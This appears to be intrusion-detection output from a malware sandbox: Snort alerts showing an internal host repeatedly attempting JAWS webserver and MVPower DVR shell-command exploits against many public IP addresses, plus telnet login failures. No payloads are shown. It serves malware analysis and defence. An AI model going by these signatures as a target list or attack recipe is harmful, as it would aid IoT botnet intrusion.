        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40256 -> 74.208.157.188:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39302 -> 92.253.233.71:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46062 -> 184.50.34.114:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39302 -> 92.253.233.71:80
        Source: TrafficSnort IDS: 716 INFO TELNET access 118.38.215.35:23 -> 192.168.2.23:59870
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.50.34.114:80 -> 192.168.2.23:46062
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46062 -> 184.50.34.114:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58970 -> 34.149.243.147:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43188 -> 86.89.69.47:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32950 -> 23.36.131.193:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43188 -> 86.89.69.47:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41092 -> 104.113.40.196:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60140 -> 38.40.218.142:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60442 -> 52.202.8.35:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54150 -> 201.219.103.254:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57214 -> 61.205.233.247:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.36.131.193:80 -> 192.168.2.23:32950
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46238 -> 23.197.54.117:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.113.40.196:80 -> 192.168.2.23:41092
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60442 -> 52.202.8.35:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60140 -> 38.40.218.142:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57214 -> 61.205.233.247:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.197.54.117:80 -> 192.168.2.23:46238
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54150 -> 201.219.103.254:80
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 118.38.215.35:23 -> 192.168.2.23:59608
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 118.38.215.35:23 -> 192.168.2.23:59608
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60920 -> 23.35.254.46:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44180 -> 35.71.136.53:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35718 -> 49.44.101.151:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44180 -> 35.71.136.53:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.35.254.46:80 -> 192.168.2.23:60920
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60920 -> 23.35.254.46:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32862 -> 23.52.31.52:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.52.31.52:80 -> 192.168.2.23:32862
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 49.44.101.151:80 -> 192.168.2.23:35718
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34764 -> 180.215.103.56:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33500 -> 61.248.137.174:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53300 -> 92.255.229.90:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41302 -> 184.87.48.7:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53300 -> 92.255.229.90:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59014 -> 147.47.75.161:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.87.48.7:80 -> 192.168.2.23:41302
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41302 -> 184.87.48.7:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42856 -> 103.242.104.218:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34764 -> 180.215.103.56:80
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 118.38.215.35:23 -> 192.168.2.23:59870
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 118.38.215.35:23 -> 192.168.2.23:59870
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33500 -> 61.248.137.174:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42856 -> 103.242.104.218:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56082 -> 211.42.61.30:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59014 -> 147.47.75.161:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56082 -> 211.42.61.30:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59534 -> 107.182.227.130:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60852 -> 192.210.173.30:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33926 -> 52.39.235.110:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50486 -> 96.16.193.43:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59534 -> 107.182.227.130:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47140 -> 67.217.88.126:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35348 -> 108.60.22.93:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 96.16.193.43:80 -> 192.168.2.23:50486
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50486 -> 96.16.193.43:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33926 -> 52.39.235.110:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47140 -> 67.217.88.126:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35348 -> 108.60.22.93:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37162 -> 133.208.167.3:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54408 -> 98.155.157.85:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33010 -> 49.50.173.16:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37162 -> 133.208.167.3:80
        Source: TrafficSnort IDS: 716 INFO TELNET access 118.38.215.35:23 -> 192.168.2.23:60322
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 14.243.16.152:23 -> 192.168.2.23:33772
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 14.243.16.152:23 -> 192.168.2.23:33772
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45018 -> 81.4.100.93:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49910 -> 151.127.47.161:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51190 -> 38.53.20.57:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33562 -> 91.147.165.111:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54162 -> 203.148.255.105:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53436 -> 45.203.66.120:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33562 -> 91.147.165.111:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54162 -> 203.148.255.105:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53436 -> 45.203.66.120:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37108 -> 220.231.189.131:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44922 -> 161.35.255.45:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56934 -> 40.114.46.195:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59264 -> 172.65.137.18:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59264 -> 172.65.137.18:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44338 -> 181.57.237.57:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44922 -> 161.35.255.45:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39154 -> 118.70.85.127:80
        Source: TrafficSnort IDS: 716 INFO TELNET access 118.38.215.35:23 -> 192.168.2.23:60516
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34748 -> 103.75.215.202:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44214 -> 104.66.129.38:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38680 -> 208.106.191.87:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39154 -> 118.70.85.127:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57848 -> 186.7.185.99:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51262 -> 107.186.108.15:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34748 -> 103.75.215.202:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.66.129.38:80 -> 192.168.2.23:44214
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51926 -> 45.194.168.235:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48960 -> 106.54.82.189:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38680 -> 208.106.191.87:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60670 -> 173.175.237.225:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51926 -> 45.194.168.235:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60670 -> 173.175.237.225:80
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 118.38.215.35:23 -> 192.168.2.23:60322
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 118.38.215.35:23 -> 192.168.2.23:60322
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57848 -> 186.7.185.99:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59080 -> 90.117.1.151:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52464 -> 195.34.103.211:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45602 -> 34.111.86.210:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48424 -> 188.128.212.168:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60048 -> 185.11.167.133:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35502 -> 185.181.164.173:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34474 -> 13.111.99.120:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60048 -> 185.11.167.133:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58474 -> 146.148.195.146:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42542 -> 103.18.2.77:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35508 -> 23.204.18.110:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38522 -> 23.50.113.10:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43448 -> 203.101.229.107:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46144 -> 185.94.255.193:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.204.18.110:80 -> 192.168.2.23:35508
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33918 -> 38.54.178.42:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55038 -> 197.25.204.12:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33918 -> 38.54.178.42:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35328 -> 23.61.67.30:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51684 -> 110.172.89.220:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51464 -> 201.184.168.82:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42786 -> 156.235.211.174:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38674 -> 104.84.32.23:80
        Source: TrafficSnort IDS: 716 INFO TELNET access 118.38.215.35:23 -> 192.168.2.23:60756
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.61.67.30:80 -> 192.168.2.23:35328
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35328 -> 23.61.67.30:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51684 -> 110.172.89.220:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42786 -> 156.235.211.174:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.50.113.10:80 -> 192.168.2.23:38522
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.84.32.23:80 -> 192.168.2.23:38674
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55038 -> 197.25.204.12:80
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 14.243.16.152:23 -> 192.168.2.23:34240
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 14.243.16.152:23 -> 192.168.2.23:34240
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 118.38.215.35:23 -> 192.168.2.23:60516
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 118.38.215.35:23 -> 192.168.2.23:60516
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40442 -> 213.3.8.55:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37892 -> 194.28.167.12:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59380 -> 89.231.18.133:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48400 -> 192.171.103.162:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38320 -> 139.177.196.201:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53216 -> 52.206.91.14:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43400 -> 212.114.86.138:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34886 -> 13.95.21.189:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43400 -> 212.114.86.138:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34886 -> 13.95.21.189:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36514 -> 62.119.253.230:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48400 -> 192.171.103.162:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34520 -> 65.8.204.114:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38320 -> 139.177.196.201:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38760 -> 189.40.194.26:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44074 -> 13.209.24.80:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53216 -> 52.206.91.14:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54468 -> 122.119.4.162:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60604 -> 44.226.206.171:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34520 -> 65.8.204.114:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57844 -> 152.0.13.162:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57554 -> 54.207.139.6:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58140 -> 13.226.253.251:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44074 -> 13.209.24.80:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38434 -> 23.8.211.190:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44952 -> 101.36.205.174:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54804 -> 200.27.90.109:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58140 -> 13.226.253.251:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45742 -> 157.205.198.100:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58304 -> 103.125.217.186:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.8.211.190:80 -> 192.168.2.23:38434
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57844 -> 152.0.13.162:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58304 -> 103.125.217.186:80
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 118.38.215.35:23 -> 192.168.2.23:60756
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 118.38.215.35:23 -> 192.168.2.23:60756
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35240 -> 141.144.234.202:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35240 -> 141.144.234.202:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58784 -> 54.93.234.69:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34666 -> 104.110.154.73:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39048 -> 65.23.182.116:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42468 -> 143.198.52.81:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.110.154.73:80 -> 192.168.2.23:34666
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34666 -> 104.110.154.73:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60204 -> 103.217.232.104:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41428 -> 103.71.69.51:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50736 -> 13.231.111.87:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55820 -> 166.62.64.192:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41428 -> 103.71.69.51:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55820 -> 166.62.64.192:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41914 -> 104.108.215.54:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.108.215.54:80 -> 192.168.2.23:41914
        Source: TrafficSnort IDS: 716 INFO TELNET access 118.38.215.35:23 -> 192.168.2.23:33030
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54518 -> 104.92.185.65:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49162 -> 204.44.197.121:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34074 -> 74.211.101.93:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35428 -> 45.66.237.153:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38406 -> 191.252.161.154:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 45.66.237.153:80 -> 192.168.2.23:35428
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37736 -> 52.60.174.85:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57306 -> 52.66.139.84:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36514 -> 211.115.69.143:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37372 -> 179.53.238.27:80
        Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.92.185.65:80 -> 192.168.2.23:54518
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49162 -> 204.44.197.121:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37736 -> 52.60.174.85:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37372 -> 179.53.238.27:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38406 -> 191.252.161.154:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36570 -> 103.148.116.89:80
        Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43270 -> 177.125.153.20:80
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36570 -> 103.148.116.89:80
        Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 14.243.16.152:23 -> 192.168.2.23:34856
        Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 14.243.16.152:23 -> 192.168.2.23:34856
        Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43270 -> 177.125.153.20:80
        Source: TrafficSnort IDS: 716 INFO TELNET access 118.38.215.35:23 -> 192.168.2.23:33340
